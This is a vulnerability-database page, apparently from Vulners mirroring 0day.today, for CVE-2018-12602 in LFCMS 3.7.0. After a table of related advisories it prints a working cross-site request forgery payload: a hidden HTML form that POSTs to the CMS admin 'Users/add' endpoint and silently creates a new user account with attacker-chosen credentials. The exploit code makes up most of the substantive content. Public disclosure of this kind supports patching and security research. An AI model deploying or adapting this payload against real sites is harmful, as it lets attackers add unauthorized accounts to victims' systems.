Lucene search
K

LFCMS 3.7.0 - Cross-Site Request Forgery (Add User) Vulnerability

🗓️ 21 Jun 2018 00:00:00Reported by bay0netType 
zdt
 zdt
🔗 0day.today👁 39 Views

LFCMS 3.7.0 Cross-Site Request Forgery (CSRF) vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
CNVD
LFCMS Cross-Site Request Forgery Vulnerability (CNVD-2018-14218)
26 Jun 201800:00
cnvd
CVE
CVE-2018-12602
25 Jun 201815:00
cve
Cvelist
CVE-2018-12602
25 Jun 201815:00
cvelist
Exploit DB
LFCMS 3.7.0 - Cross-Site Request Forgery (Add User)
21 Jun 201800:00
exploitdb
EUVD
EUVD-2018-4561
7 Oct 202500:30
euvd
exploitpack
LFCMS 3.7.0 - Cross-Site Request Forgery (Add User)
21 Jun 201800:00
exploitpack
NVD
CVE-2018-12602
25 Jun 201815:29
nvd
OSV
CVE-2018-12602
25 Jun 201815:29
osv
Packet Storm
LFCMS 3.7.0 Cross Site Request Forgery
21 Jun 201800:00
packetstorm
Prion
Cross site request forgery (csrf)
25 Jun 201815:29
prion
Rows per page
# Exploit Title: A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily.
# Exploit Author: bay0net
# Vendor Homepage: https://www.cnblogs.com/v1vvwv/p/9203740.html
# Software Link: http://www.lfdycms.com/home/down/index/id/26.html
# Version: 3.7.0
# CVE : CVE-2018-12602
 
 
A CSRF vulnerability exists in LFCMS_3.7.0: users can be added arbitrarily.
 
 
The payload for attack is as follows.
 
 
<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Users/add.html" method="POST">
      <input type="hidden" name="username" value="test222" />
      <input type="hidden" name="email" value="[email protected]" />
      <input type="hidden" name="password" value="test222" />
      <input type="hidden" name="repassword" value="test222" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

#  0day.today [2018-06-21]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation